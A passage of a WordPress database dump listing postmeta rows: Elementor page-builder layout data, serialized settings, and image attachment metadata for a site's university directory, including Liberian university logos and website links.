settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"e5be318\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Website Link\",\"selected_icon\":{\"value\":\"fas fa-link\",\"library\":\"fa-solid\"},\"_id\":\"94e8153\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"7966798\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"dbe4f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.260999999999999232613845379091799259185791015625,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"b743106\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"420f70d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Auniversity_logo%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(34009,4924,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(34010,4924,'_elementor_conditions','a:1:{i:0;s:27:\"include/singular/university\";}'),(34012,4925,'_elementor_edit_mode','builder'),(34013,4925,'_elementor_template_type','single-post'),(34014,4925,'_elementor_version','3.6.6'),(34015,4925,'_elementor_pro_version','3.7.1'),(34016,4925,'_wp_page_template','default'),(34017,4925,'_elementor_data','[{\"id\":\"80da151\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d430d58\"}]},\"elements\":[{\"id\":\"9ba3c49\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"dce858c\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"507b6ec\"}],\"structure\":\"20\"},\"elements\":[{\"id\":\"cef23df\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":75.6520000000000010231815394945442676544189453125},\"elements\":[{\"id\":\"6a355d4\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"55a3c39\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" settings=\\\"%7B%22fallback%22%3A%7B%22url%22%3A%22%22%2C%22id%22%3A%22%22%7D%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"theme-post-featured-image\"},{\"id\":\"8275ddd\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"theme-post-content\"},{\"id\":\"e5be318\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Website Link\",\"selected_icon\":{\"value\":\"fas fa-link\",\"library\":\"fa-solid\"},\"_id\":\"94e8153\",\"link\":{\"url\":\"\",\"is_external\":\"on\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"__dynamic__\":{\"link\":\"[elementor-tag id=\\\"7966798\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}}]},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"dbe4f81\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":24.260999999999999232613845379091799259185791015625,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"b743106\",\"elType\":\"widget\",\"settings\":{\"link_to\":\"custom\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"420f70d\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Auniversity_logo%22%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"e9731a1\\\" name=\\\"Pods-url\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Awebsite_link%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(34019,4925,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(34020,4925,'_elementor_conditions','a:1:{i:0;s:27:\"include/singular/university\";}'),(34021,4918,'_elementor_controls_usage','a:7:{s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}}}s:25:\"theme-post-featured-image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:1:{s:5:\"image\";i:1;}}}}s:18:\"theme-post-content\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:9:\"icon-list\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:12:\"section_icon\";a:1:{s:9:\"icon_list\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:3;}}s:8:\"advanced\";a:1:{s:16:\"section_advanced\";a:1:{s:7:\"padding\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:2;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:7:\"link_to\";i:1;s:5:\"image\";i:1;s:4:\"link\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:2;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:1;}}}}}'),(34022,4926,'_elementor_edit_mode','builder'),(34023,4926,'_elementor_template_type','loop'),(34024,4927,'_elementor_edit_mode','builder'),(34025,4927,'_elementor_template_type','loop'),(34026,4926,'_elementor_version','3.6.6'),(34027,4926,'_elementor_pro_version','3.7.1'),(34028,4926,'_edit_lock','1661252072:42'),(34029,4926,'_wp_page_template','default'),(34030,4926,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(34031,4926,'_elementor_data','[{\"id\":\"daaf287\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"86a9c81\"}]},\"elements\":[{\"id\":\"6384979\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c88e6d6\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"b8332fb\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Auniversity_logo%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ce6bf5f\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false}],\"isInner\":false}]'),(38588,9,'_elementor_css','a:6:{s:4:\"time\";i:1770854588;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:2:{i:0;s:0:\"\";i:1;s:8:\"fa-solid\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(34033,4928,'_elementor_edit_mode','builder'),(34034,4928,'_elementor_template_type','loop'),(34035,4928,'_elementor_version','3.6.6'),(34036,4928,'_elementor_pro_version','3.7.1'),(34037,4928,'_wp_page_template','default'),(34038,4928,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(34039,4928,'_elementor_data','[]'),(34041,4929,'_elementor_edit_mode','builder'),(34042,4929,'_elementor_template_type','loop'),(34043,4929,'_elementor_version','3.6.6'),(34044,4929,'_elementor_pro_version','3.7.1'),(34045,4929,'_wp_page_template','default'),(34046,4929,'_elementor_page_settings','a:2:{s:12:\"preview_type\";s:17:\"single/university\";s:10:\"preview_id\";s:4:\"4911\";}'),(34047,4929,'_elementor_data','[{\"id\":\"daaf287\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"86a9c81\"}]},\"elements\":[{\"id\":\"6384979\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c88e6d6\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"b8332fb\\\" name=\\\"pods-image\\\" settings=\\\"%7B%22key%22%3A%22university%3A4907%3Auniversity_logo%22%7D\\\"]\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ce6bf5f\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"Add Your Heading Text Here\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-post-title\"}],\"isInner\":false}],\"isInner\":false}]'),(34049,4926,'_elementor_controls_usage','a:4:{s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_image\";a:2:{s:5:\"align\";i:1;s:5:\"image\";i:1;}}}}s:16:\"theme-post-title\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"general\";a:1:{s:11:\"__dynamic__\";a:1:{s:5:\"count\";i:1;}}s:7:\"content\";a:1:{s:13:\"section_title\";a:2:{s:5:\"title\";i:1;s:5:\"align\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:1;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:1;}}}}}'),(34050,4930,'_edit_lock','1661263341:42'),(34051,4930,'_last_editor_used_jetpack','block-editor'),(34052,4930,'_edit_last','42'),(34053,4930,'kava_extra_enable_breadcrumbs','inherit'),(34054,4930,'_elementor_edit_mode','builder'),(34055,4930,'_elementor_template_type','wp-page'),(34056,4930,'_elementor_version','3.6.6'),(34057,4930,'_elementor_pro_version','3.7.1'),(34066,4933,'_elementor_edit_mode','builder'),(34067,4933,'_elementor_template_type','wp-page'),(34068,4933,'_elementor_version','3.6.6'),(34069,4933,'_elementor_pro_version','3.7.1'),(34070,4934,'_elementor_edit_mode','builder'),(34071,4934,'_elementor_template_type','wp-page'),(34072,4934,'_elementor_version','3.6.6'),(34073,4934,'_elementor_pro_version','3.7.1'),(34074,4930,'_wp_page_template','default'),(34075,4930,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"number\":8,\"columns\":\"4\"},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9c62050\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e0093e8\"}]},\"elements\":[{\"id\":\"c6ca465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(34076,4935,'_elementor_edit_mode','builder'),(34077,4935,'_elementor_template_type','wp-page'),(34078,4935,'_elementor_version','3.6.6'),(34079,4935,'_elementor_pro_version','3.7.1'),(34080,4935,'_wp_page_template','default'),(34081,4935,'_elementor_data','[{\"id\":\"0d6eb83\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e3903a8\"}]},\"elements\":[{\"id\":\"7f1ca93\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e27bf6a\",\"elType\":\"widget\",\"settings\":{\"equal_height_cols\":\"true\",\"post_type\":\"university\",\"title_trimmed_ending_text\":\"...\",\"show_excerpt\":\"\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"86e4a02\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"fbba679\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}]},\"elements\":[],\"widgetType\":\"jet-posts\"}],\"isInner\":false}],\"isInner\":false}]'),(34094,4936,'_menu_item_type','post_type'),(34095,4936,'_menu_item_menu_item_parent','127'),(34096,4936,'_menu_item_object_id','4930'),(34097,4936,'_menu_item_object','page'),(34098,4936,'_menu_item_target',''),(34099,4936,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(34100,4936,'_menu_item_xfn',''),(34101,4936,'_menu_item_url',''),(34103,404,'_wp_old_date','2021-08-19'),(34104,127,'_wp_old_date','2021-08-19'),(34105,125,'_wp_old_date','2021-08-19'),(34106,117,'_wp_old_date','2021-08-19'),(34107,123,'_wp_old_date','2021-08-19'),(34108,120,'_wp_old_date','2021-08-19'),(34109,114,'_wp_old_date','2021-08-19'),(34110,118,'_wp_old_date','2021-08-19'),(34111,129,'_wp_old_date','2021-08-19'),(34112,115,'_wp_old_date','2021-08-19'),(34113,126,'_wp_old_date','2021-08-19'),(34114,1842,'_wp_old_date','2021-08-19'),(34115,124,'_wp_old_date','2021-08-19'),(34116,2509,'_wp_old_date','2021-08-19'),(34117,2596,'_wp_old_date','2021-08-19'),(34118,2746,'_wp_old_date','2021-08-19'),(34119,116,'_wp_old_date','2021-08-19'),(34120,4937,'_wp_attached_file','2022/08/UL-1.jpg'),(34121,4937,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/08/UL-1.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"UL-1-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"UL-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"UL-1-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"UL-1-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"UL-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"UL-1-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"UL-1-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"UL-1-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"UL-1-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"UL-1-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"UL-1-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34122,4911,'university_logo','4912'),(34123,4938,'_edit_lock','1661163363:42'),(34124,4938,'_last_editor_used_jetpack','block-editor'),(34125,4939,'_wp_attached_file','2022/08/Cuttington-University-1.jpeg'),(34126,4939,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:36:\"2022/08/Cuttington-University-1.jpeg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:36:\"Cuttington-University-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:35:\"Cuttington-University-1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34127,4940,'_wp_attached_file','2022/08/cu.jpg'),(34128,4940,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:14:\"2022/08/cu.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:14:\"cu-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:14:\"cu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:14:\"cu-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:14:\"cu-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:13:\"cu-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:14:\"cu-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:14:\"cu-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:14:\"cu-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:14:\"cu-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:14:\"cu-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:14:\"cu-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34129,4938,'_thumbnail_id','4940'),(34130,4938,'_edit_last','42'),(34131,4938,'website_link','http://cu.edu.lr/index.html'),(34132,4938,'_pods_university_logo','a:1:{i:0;i:4939;}'),(34133,4938,'university_logo','4939'),(34134,4939,'_wp_old_slug','cuttington-university'),(34135,4941,'_edit_lock','1661163733:42'),(34136,4941,'_last_editor_used_jetpack','block-editor'),(34137,4942,'_wp_attached_file','2022/08/ameu-logo-1.jpg'),(34138,4942,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:23:\"2022/08/ameu-logo-1.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"ameu-logo-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:22:\"ameu-logo-1-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:10:\"mediateca2\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1613736549\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34139,4943,'_wp_attached_file','2022/08/ameu.jpg'),(34140,4943,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:16:\"2022/08/ameu.jpg\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"ameu-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"ameu-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"ameu-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"post-thumbnail\";a:4:{s:4:\"file\";s:16:\"ameu-370x265.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:15:\"ameu-150x85.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-s-2\";a:4:{s:4:\"file\";s:16:\"ameu-230x230.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"kava-thumb-m\";a:4:{s:4:\"file\";s:16:\"ameu-400x400.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"kava-thumb-m-vertical\";a:4:{s:4:\"file\";s:16:\"ameu-370x500.jpg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"kava-thumb-m-2\";a:4:{s:4:\"file\";s:16:\"ameu-570x450.jpg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-masonry\";a:4:{s:4:\"file\";s:16:\"ameu-600x311.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:311;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"kava-thumb-justify\";a:4:{s:4:\"file\";s:16:\"ameu-640x530.jpg\";s:5:\"width\";i:640;s:6:\"height\";i:530;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(34141,4941,'_thumbnail_id','4943'),(34142,4941,'_edit_last','42'),(34143,4941,'website_link','https://ame.edu.lr/index.php'),(34144,4941,'_pods_university_logo','a:1:{i:0;i:4942;}'),(34145,4941,'university_logo','4942'),(34146,4944,'_edit_lock','1661255846:42'),(34147,4944,'_last_editor_used_jetpack','block-editor'),(34148,4945,'_wp_attached_file','2022/08/umu_logo-1.png'),(34149,4945,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:200;s:6:\"height\";i:200;s:4:\"file\";s:22:\"2022/08/umu_logo-1.png\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"umu_logo-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"kava-thumb-s\";a:4:{s:4:\"file\";s:21:\"umu_logo-1-150x85.png\";s:5:\"width\";i:150;s:6:\"height\